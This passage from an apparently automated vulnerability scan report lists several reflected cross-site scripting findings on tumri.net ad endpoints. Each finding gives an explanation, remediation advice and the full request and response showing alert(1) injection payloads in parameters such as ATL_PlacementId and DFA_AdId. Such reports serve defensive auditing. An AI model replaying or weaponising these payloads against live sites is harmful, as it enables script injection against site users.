GET /ads/mti/6928?ATL_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F311947907%2Fdirect%3Bai.225134941%3Bct.1%2F01%3Fhref%3D&ATL_CampaignId=directad034\"%3balert(1)//6d4d1fce561&ATL_PlacementId=311947907&ATL_AdId=225134941&nf=10&loc=http%3A%2F%2Fview.atdmt.com%2FMGM%2Fiview%2F311947907%2Fdirect%2F01%2F539533%3Fclick%3Dhttp%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253D HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.tumri.net/ads/mti/6928?ATL_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/eb/%2a/z%3B238891755%3B1-0%3B0%3B60250584%3B4307-300/250%3B41657951/41675738/1%3Bu%3D17308911%3B%7Esscs%3D%3fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D7ec0beaf-4cf3-449c-b17a-57792b122e66%26_o%3D17161829%26_eo%3D97956%26_et%3D1309224169%26_a%3D17210724%26_s%3D11683%26_d%3D17282798%26_c%3D17161854%26_pm%3D97956%26_pn%3D17308911%26redirect%3Dhttp://clk.atdmt.com/go/311947907/direct;ai.225134941;ct.1/01?href=||&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=225134941
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-327218980|1605718887; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 01:24:01 GMT
Expires: Tue Jun 28 01:24:01 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 01:24:01 GMT; Path=/
Content-Length: 20268
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
nID":"109981","LocationName":"300x250_MGM_All","AdvertiserID":"3158","AdvertiserName":"MGMGRAND","ExperienceID":"4858","ExperienceName":"300x250_Energy","PublisherID":"MGMGRAND","ExternalBuyID":"directad034\\";alert(1)//6d4d1fce561","ExternalPageID":"311947907","ExternalAdID":"225134941","ExternalSiteID":"directad034\\";alert(1)//6d4d1fce561","CA1":"2","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802","T
...[SNIP]...

1.386. http://www.tumri.net/ads/mti/6928 [ATL_Click_Tracker parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6928

Issue detail

The value of the ATL_Click_Tracker request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54008\"%3balert(1)//5590aac141e was submitted in the ATL_Click_Tracker parameter. This input was echoed as 54008\\";alert(1)//5590aac141e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6928?ATL_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F311947907%2Fdirect%3Bai.225134941%3Bct.1%2F01%3Fhref%3D54008\"%3balert(1)//5590aac141e&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=225134941&nf=10&loc=http%3A%2F%2Fview.atdmt.com%2FMGM%2Fiview%2F311947907%2Fdirect%2F01%2F539533%3Fclick%3Dhttp%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253D HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.tumri.net/ads/mti/6928?ATL_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/eb/%2a/z%3B238891755%3B1-0%3B0%3B60250584%3B4307-300/250%3B41657951/41675738/1%3Bu%3D17308911%3B%7Esscs%3D%3fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D7ec0beaf-4cf3-449c-b17a-57792b122e66%26_o%3D17161829%26_eo%3D97956%26_et%3D1309224169%26_a%3D17210724%26_s%3D11683%26_d%3D17282798%26_c%3D17161854%26_pm%3D97956%26_pn%3D17308911%26redirect%3Dhttp://clk.atdmt.com/go/311947907/direct;ai.225134941;ct.1/01?href=||&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=225134941
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-327218980|1605718887; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 01:23:40 GMT
Expires: Tue Jun 28 01:23:41 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 01:23:41 GMT; Path=/
Content-Length: 20182
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
o%3D97956%26_et%3D1309224169%26_a%3D17210724%26_s%3D11683%26_d%3D17282798%26_c%3D17161854%26_pm%3D97956%26_pn%3D17308911%26redirect%3Dhttp://clk.atdmt.com/go/311947907/direct;ai.225134941;ct.1/01?href=54008\\";alert(1)//5590aac141e^(lp_url)","Provider":"MGMGRAND","MerchantID":"MGMGRAND","PublisherID":"MGMGRAND"};
   var alsParams={"PublisherId":"MGMGRAND"};
   var baseParams={"AdType":"mediumrectangle","RecipeID":"20864951123971","R
...[SNIP]...

1.387. http://www.tumri.net/ads/mti/6928 [ATL_PlacementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6928

Issue detail

The value of the ATL_PlacementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 663a1\"%3balert(1)//667212a48c3 was submitted in the ATL_PlacementId parameter. This input was echoed as 663a1\\";alert(1)//667212a48c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6928?ATL_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F311947907%2Fdirect%3Bai.225134941%3Bct.1%2F01%3Fhref%3D&ATL_CampaignId=direct&ATL_PlacementId=311947907663a1\"%3balert(1)//667212a48c3&ATL_AdId=225134941&nf=10&loc=http%3A%2F%2Fview.atdmt.com%2FMGM%2Fiview%2F311947907%2Fdirect%2F01%2F539533%3Fclick%3Dhttp%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253D HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.tumri.net/ads/mti/6928?ATL_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/eb/%2a/z%3B238891755%3B1-0%3B0%3B60250584%3B4307-300/250%3B41657951/41675738/1%3Bu%3D17308911%3B%7Esscs%3D%3fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D7ec0beaf-4cf3-449c-b17a-57792b122e66%26_o%3D17161829%26_eo%3D97956%26_et%3D1309224169%26_a%3D17210724%26_s%3D11683%26_d%3D17282798%26_c%3D17161854%26_pm%3D97956%26_pn%3D17308911%26redirect%3Dhttp://clk.atdmt.com/go/311947907/direct;ai.225134941;ct.1/01?href=||&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=225134941
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-327218980|1605718887; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 01:24:17 GMT
Expires: Tue Jun 28 01:24:18 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 01:24:18 GMT; Path=/
Content-Length: 20180
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
300x250_MGM_All","AdvertiserID":"3158","AdvertiserName":"MGMGRAND","ExperienceID":"4853","ExperienceName":"300x250_Craving","PublisherID":"MGMGRAND","ExternalBuyID":"direct","ExternalPageID":"311947907663a1\\";alert(1)//667212a48c3","ExternalAdID":"225134941","ExternalSiteID":"direct","CA1":"1","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802","TimeZone":"US/Eastern","UserBucket":"80","TumriMiniTag":"tru
...[SNIP]...

1.388. http://www.tumri.net/ads/mts/6565 [DFA_AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the DFA_AdId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31ad0'-alert(1)-'5b25cdd025f was submitted in the DFA_AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=23893330231ad0'-alert(1)-'5b25cdd025f&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:12:52 GMT
Expires: Tue Jun 28 02:12:53 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03340EE646379E27CD54C85EADBB40AB; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227173033 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=23893330231ad0'-alert(1)-'5b25cdd025f&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D2222300000
...[SNIP]...

1.389. http://www.tumri.net/ads/mts/6565 [DFA_BuyId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the DFA_BuyId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ea8f'-alert(1)-'4ed8cbf509c was submitted in the DFA_BuyId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=53665456ea8f'-alert(1)-'4ed8cbf509c&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:12:18 GMT
Expires: Tue Jun 28 02:12:19 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62CAFBADB083DDF26B55EABDAA9FFC81; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227139679 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
a5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=53665456ea8f'-alert(1)-'4ed8cbf509c&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;4149687
...[SNIP]...

1.390. http://www.tumri.net/ads/mts/6565 [DFA_CreativeId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the DFA_CreativeId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4d02'-alert(1)-'19d3a35ef89 was submitted in the DFA_CreativeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877e4d02'-alert(1)-'19d3a35ef89&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:13:08 GMT
Expires: Tue Jun 28 02:13:09 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1A488777DA119F0CA8BA44A3B4097EF7; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227189263 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877e4d02'-alert(1)-'19d3a35ef89&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_13092271
...[SNIP]...

1.391. http://www.tumri.net/ads/mts/6565 [DFA_PlacementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the DFA_PlacementId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7075'-alert(1)-'ac765446717 was submitted in the DFA_PlacementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000e7075'-alert(1)-'ac765446717&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
